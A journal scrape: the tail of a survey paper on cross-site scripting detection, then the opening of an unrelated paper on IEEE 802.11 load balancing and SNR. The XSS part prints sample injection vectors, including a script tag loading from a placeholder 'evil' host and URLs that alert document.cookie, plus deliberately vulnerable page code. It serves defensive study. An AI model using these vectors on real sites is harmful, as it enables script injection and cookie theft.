79.9% of the measured websites use one or more JavaScript dynamic-generation techniques; among these, the document.write(), innerHTML, and eval() functions are more popular than the safer alternatives. Their results also show that 94.9% of the measured websites register various kinds of event handlers in their web pages. A dynamically generated script (DJS) instance is identified differently for each generation technique. For the eval() function, the whole evaluated string content is regarded as a DJS instance. Within the written content of the document.write() method and the value of the innerHTML property, a DJS instance can be identified from three sources [3]:
1. between a pair of <SCRIPT> and </SCRIPT> tags;
2. in an event handler specified as the value of an HTML attribute such as onclick or onmouseover;
3. in a URL using the special javascript: protocol specifier.
I manually investigated more than 100 home pages of unique websites (reading the source files) to make a small measurement of my own. My results largely reflect their outcome.
TABLE I. INSECURE JAVASCRIPT PRESENCE IN HTML FILES
To eliminate this risk, developers have to avoid insecure JavaScript practices: external JavaScript inclusion should be replaced with internal JavaScript files, and the eval() function should be replaced with a safer alternative [3].
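As one concrete instance of replacing eval() with a safer function, consider parsing attacker-influenced JSON. The sketch below is our illustration of the recommendation in [3], not code from that paper: JSON.parse() only ever yields data, whereas in a browser eval('(' + s + ')') on the same string could execute trailing code.

```javascript
// Safe path: JSON.parse yields plain data from well-formed JSON.
const good = '{"name": "Joe"}';
console.log(JSON.parse(good).name); // Joe

// Malicious path: a trailing expression smuggled after the object.
// In a browser, eval('(' + evil + ')') would evaluate the comma
// expression and invoke alert(1); JSON.parse simply refuses it.
const evil = '{"name": "Joe"} , alert(1)';

let rejected = false;
try {
  JSON.parse(evil); // a data-only parser throws on the extra code
} catch (e) {
  rejected = true;
}
console.log(rejected); // true
```

Swapping eval() for a purpose-built parser thus removes an entire class of DJS instances from the page.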
B. Malicious code between Static Scripts
User input placed between existing scripting code is a vital issue when detecting XSS, and it is hard to find any existing system that solves this dilemma properly. There are two kinds of scripting code in a web page: static code and dynamic code (composed at runtime). Let us begin the discussion of this issue with an example.
<SCRIPT> var a = $ENV_STRING; </SCRIPT>
Figure 5. User given data between static script code
In the example above, both the starting and ending script tags are static, and the user input sandwiched between them is what makes the scripting code executable. The problem is that any successful injection in this context may create an XSS vector. The strong filters in existing systems all try to find malicious code in the user input, and this kind of situation in static code can help attackers circumvent any such detecting filter. For instance, the Samy MySpace worm introduced a keyword prohibited by the filters (innerHTML) through JavaScript code that reconstructed it at the client end as eval('inner' + 'HTML') [10]. On the other hand, we cannot simply eliminate static scripting code while filtering, because it is legitimate, and there may be safe user input between such legitimate code. It is therefore hard to isolate and filter input that builds such constructs without understanding the syntactical context in which it is used [11]; the meaning of the syntax is a vital concern while filtering.
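The Samy trick above can be reproduced in a few lines (our reconstruction of the idea, not the worm's actual code): the forbidden keyword never appears literally in the submitted source, yet string concatenation rebuilds it at run time.

```javascript
// The source an attacker submits; a keyword blacklist scanning it finds
// no occurrence of the forbidden token "innerHTML".
const submittedSource = "eval('inner' + 'HTML')";

console.log(submittedSource.includes('innerHTML')); // false

// But at run time the two halves reassemble into exactly that token:
console.log('inner' + 'HTML'); // innerHTML
```

A filter that inspects the static text of the script therefore passes the payload, while the browser, evaluating it, reconstructs and uses the forbidden property name.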
No. of HTML files | JS | DJS: eval | DJS: document.write | DJS: innerHTML
106               | 83 | 19        | 92                  | 7
C. Browser-specific Problems
The diversity of browser behavior is one of the major problems in detecting vulnerabilities. Different browsers parse a web page differently: some follow the W3C rules and some follow their own. This multifaceted behavior of browsers makes many filters weak. Moreover, a browser cannot distinguish between a benign script and one crafted from malicious input; browsers stand ready to execute every script, which is a cause of XSS attacks. For instance, some browsers accept a newline or white space within the "javascript" portion of a javascript: URL, and some do not.
<img src = 'javascript:alert(1)'>
Figure 6. Newline between JavaScript
This will result in script execution in some browsers. Other vectors rely on the ad-hoc ("quirk") behavior of a particular HTML parser; e.g., only Firefox executes the following.
<SCRIPT/XSS SRC=http://evil/e.js></SCRIPT>
Figure 7. SCRIPT followed by non-character
Let us look at another case:
preg_replace("/\<SCRIPT(.*?)\>(.*?)\<\/SCRIPT(.*?)\>/i", "SCRIPT BLOCKED", $VALUE);
Figure 8. Detect closing SCRIPT tag
The preg_replace call above looks for a closing script tag. Some browsers do not execute scripting code that lacks a closing script tag, but this is not true of all of them: most browsers accept scripting code without a closing tag and automatically insert the missing tag [19]. This generosity helps an attacker insert malicious code easily, so proper validation against malicious payloads is difficult to get right. The parsing behavior of different browsers must be a vital concern when developing any tool for detecting untrusted user input. Some existing systems have tried to overcome this problem, but I think none of them is correct for all browsers.
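To see the problem concretely, here is a JavaScript port of the preg_replace idea of Fig. 8 (our port, not the original PHP): the pattern insists on a closing tag, so an unclosed script element sails straight through, even though a lenient browser that auto-inserts the missing tag would still execute it.

```javascript
// Port of the Fig. 8 filter: match only complete <script>...</script> pairs.
const pattern = /<script(.*?)>(.*?)<\/script(.*?)>/i;

function blockScripts(value) {
  return value.replace(pattern, 'SCRIPT BLOCKED');
}

// With the closing tag present, the filter fires:
console.log(blockScripts('<SCRIPT>alert(1)</SCRIPT>')); // SCRIPT BLOCKED

// Without it, the filter is blind, yet browsers that auto-insert the
// missing </script> would still fetch and run the external payload:
const unclosed = '<SCRIPT SRC=http://evil/e.js>';
console.log(blockScripts(unclosed) === unclosed); // true
```

The mismatch between what the regular expression requires and what real parsers tolerate is precisely the browser-specific gap described above.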
D. DOM-based Problems
One of the crucial problems of most existing systems is that they cannot detect DOM-based XSS, and identifying only stored and reflected XSS is not sufficient to cover the whole XSS domain. According to Amit Klein's article, DOM-based XSS is one of the upcoming injection problems on the web, because most issues related to the other types of XSS are being cleaned up on major websites [16], so attackers will turn to this third type of vulnerability. As we already know, a DOM-based XSS vector need not appear at the server and is not easy for a server to identify, which gives attackers an extra advantage. DOM-based XSS was introduced by Amit Klein in his article [16]; this type of XSS can be hidden in JavaScript code, and many strong web application firewalls fail to filter the malicious code.
In the eXtensible Markup Language (XML) world, there are mainly two types of parser: DOM and SAX. DOM-based parsers load the entire document as an object structure, which provides methods and variables to move around the document easily and to modify nodes, values, and attributes on the fly. Browsers work with the DOM: when a page is loaded, the browser parses it into such an object structure. getElementsByTagName, for example, is a standard DOM function used to locate XML/HTML nodes by their tag name.
Let us discuss this topic in depth using Amit Klein's example. Say the content of http://www.vulnerable.site/welcome.html is as follows:
<HTML>
<TITLE> Welcome! </TITLE>
<SCRIPT>
  var pos = document.URL.indexOf("name=") + 5;
  document.write(document.URL.substring(pos, document.URL.length));
</SCRIPT>
<BR>
Welcome to our System
</HTML>
Figure 9. HTML page
If we analyze the code of this example, we see that the developer has forgotten to sanitize the value of the "name" GET parameter, which is written into the document as soon as it is retrieved. A normal use of this page looks like http://www.vulnerable.site/welcome.html?name=Joe (if the user input is 'Joe'). However, if the user input is scripting code, an XSS situation results, e.g.:
http://vulnerable.site/welcome.html?name=<SCRIPT>alert(document.cookie)</SCRIPT>
Figure 10. DOM-based XSS vector
Many people may disagree and argue that the malicious code is still being sent to the server, where a filter can identify it. Let us then see an updated version of the previous example.
http://vulnerable.site/welcome.html#name=<SCRIPT>alert(document.cookie)</SCRIPT>
Figure 11. DOM-based XSS vector with (#) sign
Here the hash sign (#) right after the file name acts as the fragment delimiter, and anything beyond it is not part of the query. Most well-known browsers do not send the fragment to the server, so the malicious part of the code never reaches the server, and the server sees only the equivalent of http://www.vulnerable.site/welcome.html. More DOM-based XSS scenarios appear in Amit Klein's article [16]. He suggests
that minimizing insecure JavaScript practice in code may reduce the chances of DOM-based XSS. Web developers must be very careful when relying on local variables for data and control, and should pay attention to the scenarios in which the DOM is modified with user input.
Automated testing has only very limited success at identifying and validating DOM-based XSS, because it usually identifies XSS by sending a specific payload and attempting to observe it in the server response. This may work for Fig. 9 if we set aside the (#) trick, but it may not work in the following contrived case:
<SCRIPT>
  var navAgt = navigator.userAgent;
  if (navAgt.indexOf("MSIE") != -1) {
    document.write("You are using IE and visiting site " +
                   document.location.href + ".");
  } else {
    document.write("You are using an unknown browser.");
  }
</SCRIPT>
Figure 12. DOM-based XSS vector
For this reason, automated testing will not detect areas that may be susceptible to DOM-based XSS unless the testing tool can perform additional analysis of the client-side code [34]. Manual testing should therefore be undertaken; it can be done by examining the areas of the code where parameters that may be useful to attackers are referenced. Examples of such areas include places where code is dynamically written to the page, where the DOM is otherwise modified, or where scripts are directly executed.
E. Multi-Module Problems
The vulnerability of a server page is a sufficient condition for the vulnerability of a web application, but it is not a necessary condition [1]. In other words, protecting any single page from malicious code never guarantees the protection of the entire web application. A server page may send user data to another page, or to a persistent data store, instead of to the client browser; in these situations, XSS may occur through another page. Most existing systems provide no procedure for handling this difficulty. In the multi-module scenario, data may be passed from one module to another using session variables, whose state is referenced through cookies. The example below is taken from [25].
In the example of Fig. 13, user input is stored in a session variable and later copied into the $name variable. In Fig. 14, the session variable is echoed from a different page. Any filtering applied to the $name variable therefore has no effect on the session variable, so malicious code can create an XSS vector through the session variable and bypass the filtering process. Bisht and Venkatakrishnan, and Balzarotti, Cova, Felmetsger, and Vigna solve the multi-module problem in their work [11, 25], but most other tools have no technique for handling it.
<HTML>
<HEAD>
<TITLE> Enter User Name: </TITLE>
</HEAD>
<BODY>
<?php
  // connect to the existing session
  session_start();
  if (isset($_POST["user"])) {
    $name = addslashes($_POST["user"]);
    // create a session variable and set it from the php variable
    session_register("ses_var");
    $HTTP_SESSION_VARS["ses_var"] = $name;
    exit;
  }
?>
<FORM action = "create.php" method = "POST">
UserName : <input name = "user" type = "text">
<input name = "OK" type = "submit">
</FORM>
</BODY>
</HTML>

Figure 13. Session variable problem - 1st page
<?php
  echo $_SESSION["ses_var"];
?>

Figure 14. Session variable problem - 2nd page
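The hole in Figs. 13 and 14 can be condensed into a runnable sketch (our model in JavaScript, not code from [25]): a plain object stands in for the session store shared across pages, and sanitizing the local copy of the input does nothing to the stored copy.

```javascript
// Toy model of the multi-module hole: raw input is copied into a shared
// session store first, and only the local variable is filtered afterwards.
const session = {}; // stands in for $_SESSION shared across pages

function pageOne(userInput) {
  session.ses_var = userInput;          // raw value stored in the session
  const name = userInput
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');             // only the local copy is filtered
  return name;
}

function pageTwo() {
  return session.ses_var;               // echoed on a different page
}

const local = pageOne('<SCRIPT>steal()</SCRIPT>');
console.log(local.includes('<SCRIPT>'));     // false: local copy is clean
console.log(pageTwo().includes('<SCRIPT>')); // true: session copy is not
```

Any single-page analysis that inspects only the filtered local variable concludes the page is safe, while the raw payload still flows to the second page through the session store.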
After reading the source code of the LogiCampus Educational Platform [33], an open-source web application, in search of the XSS holes mentioned above, I found several; the numbers of the different kinds of holes are given in Table II. To find DOM-based XSS holes, I looked for DOM-modification code and code used to write to the client-side web page. Any pattern that uses user-defined data dynamically, such as an event handler or inline scripting code, was tracked to analyze the static-script-code problem. The multi-module problem is mainly caused by session variables, so I followed the data flow through session variables. This application uses several session variables, but it applies filtering functions before showing any user-defined data to the client side, so none of those session variables will create a multi-module problem for this application.
TABLE II. XSS HOLES IN A PARTICULAR WEB APPLICATION
Application Name                | PHP files | HTML files | DOM-based | Static Script | Multi-Module
LogiCampus Educational Platform | 186       | 543        | 7         | 12            | 0
V. EVALUATION
Ten well-known methodologies used to detect cross-site scripting are analyzed in this section against my five problem categories. Table III describes the capability of these well-known tools to solve the problems mentioned in the previous section.
The results of this analysis are based on knowledge acquired during my survey, and some of them are based on other papers' comments on those tools. The first column states the authors or researchers behind each tool. If a tool has Low status under a problem, it is unable to solve that problem; if it has High status, it is able to resolve the problem; and in the case of Medium, the tool may solve some part of the problem. For instance, the method of Jim, Swamy, and Hicks [10] has Low status under the multi-module problem, which indicates that the tool cannot solve it. Table IV gives the false positive rates of those tools; these results are based on the tools' own reported results and comments, with some drawn from other papers' comments about them. Some entries in Table IV carry Not Identified, meaning I could not summarize them. In Table III, the method of Kirda, Kruegel, Vigna, and Jovanovic [13] has High status under all problems and thus seems capable of resolving all of them; but in Table IV their method has a High false positive rate, which is a massive disadvantage for any tool. The remaining problem category from the previous section, insecure practice of JavaScript, is not included, because DOM-based XSS and malicious code between static scripts are themselves results of insecure JavaScript practice. It is true that I did not analyze these tools practically, because I do not have them; instead I worked from their published algorithms and procedures, and I believe this is sufficient to provide a real picture.
VI. CONCLUSION
This is my analysis report on the most well-known injection problem, cross-site scripting. I did not implement or run any tools in experiments; I used the published algorithms and procedures to understand how they work, and I summarized their successes as well as their limitations. I did not find any method that is 100% perfect, and I am not presenting a tool of my own that can detect XSS; I keep that task for future work. Web applications perform many critical tasks and deal with sensitive information, and in daily life we pass a great deal of confidential data through this medium, so the platform must be secure and stable. Web applications currently face security problems from injection attacks, of which XSS is one, and researchers are working hard to make the web application platform more reliable. This survey will help them in further research on this issue; I believe it provides a summary of the methodologies used for detecting XSS, together with their limitations and successes.
TABLE III. EXISTING METHODS' CAPABILITY TO RESOLVE PROBLEMS

Authors                                    | Browser-specific | DOM-based | Static Script | Multi-Module
Su and Wassermann [2]                      | Low              | Low       | Low           | Low
Minamide [5]                               | Low              | Low       | Low           | Low
Huang, Hang, Yu, Tsai, and Lee [6]         | Low              | Low       | Low           | Low
Jim, Swamy, and Hicks [10]                 | High             | High      | High          | Low
Jovanovic, Kruegel, and Kirda [12]         | Low              | Low       | Low           | Low
Kirda, Kruegel, Vigna, and Jovanovic [13]  | High             | High      | High          | High
Y. Huang, S. Huang, Lin, and Tsai [15]     | Low              | Low       | Low           | Low
Pietraszek and Berghe [18]                 | High             | Low       | High          | Low
Huang, Hang, Tsai, Lee, and Kuo [28]       | Low              | Low       | Low           | Low
Wassermann and Su [29]                     | Medium           | Low       | Low           | Low

TABLE IV. FALSE POSITIVE RATE OF EXISTING METHODS

Authors                                    | False positive
Su and Wassermann [2]                      | Low
Minamide [5]                               | Medium
Huang, Hang, Yu, Tsai, and Lee [6]         | High
Jim, Swamy, and Hicks [10]                 | Low
Jovanovic, Kruegel, and Kirda [12]         | Medium
Kirda, Kruegel, Vigna, and Jovanovic [13]  | High
Y. Huang, S. Huang, Lin, and Tsai [15]     | Not Identified
Pietraszek and Berghe [18]                 | Medium
Huang, Hang, Tsai, Lee, and Kuo [28]       | Not Identified
Wassermann and Su [29]                     | Medium
REFERENCES
[1] S. M. Metev, and V. P. Veiko, “Laser Assisted Microtechnology,” 2nded., R. M. Osgood, Jr., Ed. Berlin, Germany: Springer-Verlag, 1998.
[2] Z. Su and G. Wassermann, "The Essence of Command Injection Attacks in Web Applications," In Proceedings of the 33rd Annual Symposium on Principles of Programming Languages, USA: ACM, January 2006, pp. 372-382.
[3] C. Yue and H. Wang, "Characterizing Insecure JavaScript Practices on the Web," In Proceedings of the 18th International Conference on World Wide Web, Madrid, Spain: ACM, April 20-24, 2009.
[4] Y. Xie, and A. Aiken, “Static detection of security vulnerabilities inscripting languages,” In Proceeding of the 15th USENIX SecuritySymposium , July 2006, pp. 179-192.
[5] Y. Minamide, “Static Approximation of Dynamically Generated WebPages,” In Proceedings of the 14th International Conference on the WorldWide Web , 2005, pp. 432-441.
[6] Y.-W. Huang, F. Yu, C. Hang, C. H. Tsai, D. Lee, and S.Y. Kuo,“Securing web application code by static analysis and runtime
protection,” In Proceedings of the 13th International World Wide WebConference, 2004.
[7] A.S. Christensen, A. Møller, and M.I. Schwartzbach, "Precise analysis of string expressions," In Proceedings of the 10th International Static Analysis Symposium, vol. 2694 of LNCS, Springer-Verlag, pp. 1-18.
[8] Wikipedia, http://wikipedia.org.
[9] V.B. Livshits, and M.S. Lam, “Finding security errors in Java programswith static analysis,” In proceedings of the 14th Usenix securitysymposium , August 2005, pp. 271-286.
[10] T. Jim, N. Swamy, and M. Hicks, “BEEP: Browser-Enforced EmbeddedPolicies,” In Proceedings of the 16th International World Wide WebConference, ACM, 2007, pp. 601-610.
[11] P. Bisht, and V.N. Venkatakrishnan, “XSS-GUARD: Precise dynamic prevention of Cross-Site Scripting Attacks,” In Proceeding of 5th
Conference on Detection of Intrusions and Malware & VulnerabilityAssessment, LNCS 5137, 2008, pp. 23-43.
[12] N. Jovanovic, C. Kruegel, and E. Kirda, “Pixy: A static analysis tool for detecting web application vulnerabilities (short paper),” In 2006 IEEESymposium on Security and Privacy, Oakland, CA: May 2006.
[13] E. Kirda, C. Kruegel, G. Vigna, and N. Jovanovic, "Noxes: A client-side solution for mitigating cross-site scripting attacks," In Proceedings of the 21st ACM Symposium on Applied Computing, ACM, 2006, pp. 330-337.
[14] Grossman, RSNAKE, PDP, Rager, and Fogie, "XSS Attacks: Cross-Site Scripting Exploits and Defense," Syngress Publishing Inc., 2007.
[15] Y.-W. Huang, S.-K. Huang, T.-P. Lin, and C.-H. Tsai, “Web applicationsecurity assessment by fault injection and Behavior Monitoring,” InProceeding of the 12th international conference on World Wide Web ,ACM, New York, NY, USA: 2003, pp.148-159.
[16] A. Klein, “DOM Based Cross Site Scripting or XSS of the Third Kind,”http://www.webappsec.org/projects/articles/071105.html, July 2005.
[17] “OWASP Document for top 10 2007- cross Site Scripting,”http://www.owasp.org/index.php/Top_10_2007-Cross_Site_Scripting.
[18] T. Pietraszek, and C. V. Berghe, “Defending against Injection Attacksthrough Context-Sensitive String Evaluation,” In Proceeding of the 8th
International Symposium on Recent Advance in Intrusion Detection(RAID), September 2005.
[19] D. Balzarotti, M. Cova, V. Felmetsger, N.Jovanovic, E. Kirda, C.Kruegel, and G. Vigna, “Saner: Composing Static and DynamicAnalysis to Validate Sanitization in Web Applications,” In IEEEsymposium on Security and Privacy, 2008.
[20] “Web Application Security Assessment,” SPI Dynamics Whitepaper,SPI Dynamics, 2003.
[21] “Web Application Security Testing – AppScan 3.5,” Sanctum Inc.,http://www.sanctuminc.com.
[22] “JavaScript Security: Same origin,” Mozilla Foundation,http://www.mozilla.org/projects/security/components/same-origin.html,February 2006.
[23] “InterDo Version 3.0,” Kavado Whitepaper, Kavado Inc. , 2003.
[24] “AppShield,” Sanctum Inc. http://sanctuminc.com, 2005.
[25] D. Balzarotti, M. Cova, V. V. Felmetsger, and G. Vigna, “Multi-ModuleVulnerability Analysis of Web-based Applications,” In proceeding of 14th ACM Conference on Computer and Communications Security,Alexandria, Virginia, USA: October 2007.
[26] N. Jovanovic, C. Kruegel, and E. Kirda, “Precise alias analysis for syntactic detection of web application vulnerabilities,” In ACMSIGPLAN Workshop on Programming Languages and Analysis for security, Ottowa, Canada: June 2006.
[27] D. Scott, and R. Sharp, “Abstracting Application-Level Web Security,”In Proceeding 11th international World Wide Web Conference,Honolulu, Hawaii: 2002, pp. 396-407.
[28] Y.-W Huang, F. Yu, C. Hang, C. –H. Tsai, D. Lee, and S. –Y. Kuo.“Verifying Web Application using BoundedModel Checking,” InProceedings of the International Conference on Dependable Systems and
Networks, 2004.
[29] G. Wassermann, and Z. Su, “Static detection of cross-site Scriptingvulnerabilities,” In Proceeding of the 30th International Conference onSoftware Engineering, May 2008.
[30] S. Christey, “Vulnerability type distributions in CVE,”http://cwe.mitre.org/documents/vuln-trends.html, October 2006.
[31] H. Hosoya, B. C. Pierce, “Xduce: A typed xml processing language(preliminary report),” In Proceeding of the 3rd International Workshopon World Wide Web and Databases, Springer-Verlag, London, UK:2001, pp. 226—244.
[32] M. Mohri, M. Nederhof, “Regular approximation of context-freegrammars through transformation,” Robustness in Language and SpeechTechnology, 1996, pp. 231-238
[33] “LogiCampus Educational Platform,”http://sourceforge.net/projects/logicampus
[34] “Testing for DOM-based cross-site scripting (OWASP-DV-003),”http://www.owasp.org/index.php/Testing_for_DOM-
based_Cross_site_scripting_(OWASP-DV-003)
31 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 38/215
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No.2, 2009
HAMDI Salah¹
Computer Sciences Department
ISSAT of Sousse
Sousse, Tunisia
¹hamdisalah@yahoo.fr
Abstract — In IEEE 802.11, load balancing algorithms (LBA) consider only the number of associated stations when balancing the load of the available access points (APs). However, even when the APs are balanced, a bad situation arises if an AP's signal-to-noise ratio (SNR) is lower than that of its neighbors. Balancing the load and associating a mobile station to an access point without regard for the AP's SNR can therefore lead to unpredictable QoS in terms of bit rate, end-to-end delay, packet loss, and so on. In this paper, we study an improved load balancing algorithm that integrates the SNR into the selection policy.
Keywords: IEEE 802.11, QoS, Load Balancing Algorithm,
Signal to Noise Ratio, MPEG-4
I. INTRODUCTION
During the communication process, a mobile station always selects the nearby access point that offers the best signal strength among all available APs. However, as the number of clients per AP increases, the bit rate per client and the overall network performance decrease. In the various IEEE 802.11 standards, the association of a mobile station with an access point is decided only on physical-layer considerations, without regard for the load on the APs. As a result, some access points become far more loaded than their neighbors and the quality of service degrades. Many techniques and approaches have been proposed to solve this unbalanced-load problem in IEEE 802.11; they usually rely on load balancing algorithms (LBA) to spread traffic across the available Wi-Fi nodes.

In this paper, we present an experimental analysis of QoS and of a load balancing algorithm in IEEE 802.11. The paper is organized as follows: Section 2 outlines the unbalanced-load problem. Section 3 reviews several approaches that address it. Section 4 discusses the limits of LBA. Section 5 describes the experimental platform (an IP camera transmitting MPEG-4 video, APs, mobile stations, etc.) we used to apply the algorithm and run several experiments in an IEEE 802.11 environment; we applied the LBA proposed in [4, 5, 8] and analyzed its efficiency. Section 6 presents our contribution to improving LBA.
Finally, Section 7 concludes this work.
SOUDANI Adel², TOURKI Rached³
Laboratory of Electronics and Microelectronics
Sciences Faculty of Monastir
Monastir, Tunisia
²adel.soudani@issatso.rnu.tn, ³rached.tourki@fsm.rnu.tn
II. PROBLEM OF UNBALANCED LOAD IN IEEE 802.11
In IEEE 802.11 load balancing, "load" means the number of active processes per access point, and a load balancing mechanism attempts to keep the same number of active processes in every cell [10]. The IEEE 802.11 standard does not specify an automatic load distribution mechanism. In hot spots with many distributed access points, a mobile station always selects the AP offering the best signal-to-noise ratio (SNR); users pick the nearest AP without regard for its traffic state. This causes a problem in wireless LANs that are not properly dimensioned, where some APs manage many more mobiles than their neighbors. Loading one access point far more than another thus creates an unbalanced-load problem. Figure 1 shows a mobile station moving among several APs with no QoS criterion to help it choose one AP over another.
Fig. 1. Unbalanced load problem
A load balancing algorithm is applied in the overlap zones of the different APs, where a mobile station can be reattached from one access point to another.
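The default association behavior described above can be sketched in a few lines. This is a hypothetical illustration, not code from the paper: the AP names, SNR values, and data structures are invented to show how "always join the strongest-SNR AP" leaves one AP overloaded while its neighbor sits idle.

```python
# Sketch of the default IEEE 802.11 association rule: each station joins
# the AP with the strongest SNR, ignoring load. Names and dB values are
# illustrative only.

def pick_ap_by_snr(snr_per_ap):
    """Return the AP offering the best signal-to-noise ratio (dB)."""
    return max(snr_per_ap, key=snr_per_ap.get)

def associate_all(stations):
    """Associate every station to its best-SNR AP and count the resulting load."""
    load = {}
    for station, snr_per_ap in stations.items():
        ap = pick_ap_by_snr(snr_per_ap)
        load[ap] = load.get(ap, 0) + 1
    return load

# Three stations clustered near AP1: all of them pick AP1, AP2 stays idle.
stations = {
    "STA1": {"AP1": 45, "AP2": 20},
    "STA2": {"AP1": 40, "AP2": 25},
    "STA3": {"AP1": 38, "AP2": 30},
}
print(associate_all(stations))  # {'AP1': 3} -- unbalanced: AP2 serves nobody
```

Running the sketch shows the unbalanced-load problem of Figure 1: the per-station decision is locally optimal but globally poor.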
III. PREVIOUS LOAD BALANCING APPROACHES
I. Papanikos et al. [2] indicate that a load balancing policy is necessary to distribute the mobile stations among the different access points. They proposed a load balancing procedure that attaches each mobile station to an AP so as to balance the number of users per AP.
Experimental Performances Analysis of Load Balancing Algorithms in IEEE 802.11
S. Sheu et al. [1] proposed the Dynamic Load Balance Algorithm (DLBA), which distributes WLAN users according to the number of clients per AP.
The authors of [9] proposed an algorithm to decrease congestion and balance user traffic in IEEE 802.11. Each access point uses a different channel to avoid congestion and signal interference. The algorithm finds the Most Congested Access Point (MCAP), analyzes the user associations, and reduces the congestion of the MCAP. A user is associated with an AP only if the Signal-to-Interference Ratio (SIR) is positive and the signal power exceeds a fixed threshold.
The work in [7] presented a cell breathing technique to balance the APs' load and improve the QoS of real-time applications. It reduces the signal strength of the congested APs, shrinking their coverage and the number of users per congested AP, while increasing the signal strength and coverage of the under-loaded APs, so that disconnected stations reattach to the under-loaded access points.
V. Aleo et al. [4, 5] proposed a load balancing algorithm for hot spots. The algorithm balances on the bit rate carried by each AP rather than on the number of clients, because user traffic is variable and there is no strong correlation between the number of clients and their traffic. Overloaded access points are not authorized to associate newly arriving stations.
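The bit-rate-based policy of [4, 5] can be sketched as an admission filter followed by the usual SNR choice. This is a minimal, assumed reconstruction: the threshold value, traffic figures, and function names are invented for illustration and are not taken from those papers.

```python
# Sketch (assumed details) of a bit-rate-based balancing policy in the spirit
# of [4, 5]: balance on aggregate traffic per AP, not client count, and let
# overloaded APs refuse new associations. Threshold and rates are illustrative.

OVERLOAD_KBPS = 5000  # assumed per-AP capacity threshold

def admissible_aps(ap_traffic_kbps):
    """APs whose aggregate traffic is below the overload threshold."""
    return [ap for ap, kbps in ap_traffic_kbps.items() if kbps < OVERLOAD_KBPS]

def choose_ap(ap_traffic_kbps, snr_per_ap):
    """Among admissible APs, pick the one with the best SNR.

    If every AP is overloaded, fall back to the plain best-SNR choice.
    """
    candidates = admissible_aps(ap_traffic_kbps) or list(snr_per_ap)
    return max(candidates, key=lambda ap: snr_per_ap[ap])

traffic = {"AP1": 6200, "AP2": 1100}   # AP1 is overloaded
snr = {"AP1": 50, "AP2": 35}
print(choose_ap(traffic, snr))  # AP2: AP1 has the better SNR but refuses new stations
```

The point of the sketch is the ordering of the two tests: load admission first, signal quality second, which is exactly what Section IV argues can backfire when the admissible AP's SNR is too weak.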
IV. LOAD BALANCING ALGORITHM LIMITS
Wireless link characteristics are not constant; they vary over time and place [6]. Load balancing algorithms consider only the number of associated stations when balancing the load across all APs. However, even when the APs are balanced, a bad situation arises if an AP's associated stations receive a lower SNR than they would from neighboring APs: the AP's channel suffers and the number of lost packets increases. If an IEEE 802.11 network is not dimensioned correctly and the APs are poorly placed, applying a load balancing algorithm cannot improve the QoS [3]. Moreover, associating a mobile station to an access point without considering the SNR received from that AP can lead to unpredictable QoS in terms of bit rate, end-to-end delay, packet loss, and so on. An under-loaded access point with a low signal-to-noise ratio cannot improve the QoS. Before applying LBA and moving a mobile station from one AP to another, it is therefore very important to account for noise, signal interference, distance, and the geographic distribution of the available APs, and hence their signal levels. An access point with a low SNR must not be considered during LBA execution. We set out to demonstrate this experimentally: we use a platform with an IP camera and several APs to analyze the QoS of MPEG-4 transmission over IEEE 802.11 and to measure various parameters.
V. EXPERIMENTATIONS & RESULTS
A. Exp1: Insufficiency of SNR
The objective of this first experiment is to analyze MPEG-4 video quality and to measure several QoS parameters. We show the variation of bit rate, end-to-end delay, jitter, packet loss, etc., as functions of the SNR and the load of the APs.
Fig. 2. Bit rate variation (bit rate = f(SNR, Traffic); traffic loads 480, 570, 2944 and 12237 kbps; SNR 20–50 dB)

Fig. 3. Frame end-to-end delay variation (delay = f(SNR, Traffic); same traffic loads; SNR 20–50 dB)

Fig. 4. Frame jitter variation (jitter = f(SNR, Traffic); same traffic loads; SNR 20–50 dB)
Fig. 5. Frame rate variation
Fig. 6. PSNR variation
Figure 2 shows the bit rate variation as a function of SNR and load. The bit rate increases with SNR. However, as the AP's load increases, the bit rate decreases even when the SNR remains strong; for example, with traffic of 12237 kbps and SNR = 50 dB, the bit rate (243 kbps) is lower than the value (550 kbps) measured with traffic of 570 kbps, despite the weaker SNR in the latter case.
Figure 3 demonstrates that the delay does not simply improve with SNR. Even with a strong SNR (50 dB), at 12237 kbps of traffic the frame delay (333 ms) exceeds the value (59 ms) measured with 480 kbps of traffic and SNR = 30 dB.
As Figure 4 shows, frame jitter does not vary in proportion to the signal-to-noise ratio: when an access point is overloaded, jitter increases even at a good SNR. We measured a very bad jitter (293 ms) with traffic of 12237 kbps and SNR = 50 dB, but a good jitter (56 ms) with traffic of 480 kbps and only a medium SNR (30 dB).
In Figure 5, we measured the number of frames received per second as a function of the SNR and the load of the AP. A good SNR increases the frame rate, but the rate drops to 3 fps with traffic of 12237 kbps even at a good SNR (50 dB), because the AP is overloaded, whereas the rate was good (17 fps) with traffic of 480 kbps at only a medium SNR (30 dB).
Figure 6 demonstrates that video quality, and hence PSNR, increases with signal strength, but that the traffic of the access point also affects video quality.
Based on the previous figures and interpretations, QoS parameters improve when the signal-to-noise ratio is strong, but overloading an AP degrades the QoS even when the SNR remains good. Considering only the SNR and the physical characteristics of the channel is therefore not sufficient to improve QoS. We have shown experimentally how strongly the load affects the QoS parameters of MPEG-4 transmission: the AP's load must be taken into account at IEEE 802.11 association time.
B. Exp2: Performance analysis of LBA
The objective of this second experiment is to reuse our platform (an IP camera transmitting MPEG-4 video, APs, mobile stations, etc.) and apply LBA between two unbalanced access points. Since the IEEE 802.11 standard does not distribute AP traffic automatically, we applied LBA manually, based on the sum of the traffic, and moved one mobile station to balance the load of the two available access points.
Fig. 7. Bit rate variation
[Fig. 5 plot: frame rate = f(SNR, Traffic); traffic loads 480, 570, 2944 and 12237 kbps; SNR 20–50 dB]

[Fig. 6 plot: PSNR = f(SNR, Traffic); traffic loads 570, 815, 11657 and 12611 kbps; SNR 20–60 dB]

[Fig. 7 plot: bit rate = f(SNR, Load); unbalanced APs vs. LBA; SNR 20–80 dB]
Fig. 8. Bit rate variation
Fig. 9. Bit rate variation
First, Figures 7, 8 and 9 show the efficiency of the load balancing algorithm in enhancing the users' bit rate. In Figure 7, we applied LBA at a signal strength of 80 dB, and the rate increased from 317 kbps to 442 kbps.
On the other hand, the bit rate falls again when the SNR is weak: although the APs are balanced, we measured 225 kbps, which is less than the value measured when the APs were unbalanced (317 kbps). The same observation holds in Figures 8 and 9: balancing the APs at a signal strength SNR1 increases the bit rate, but the rate falls again at a weaker signal strength SNR2, below the value measured at SNR1.
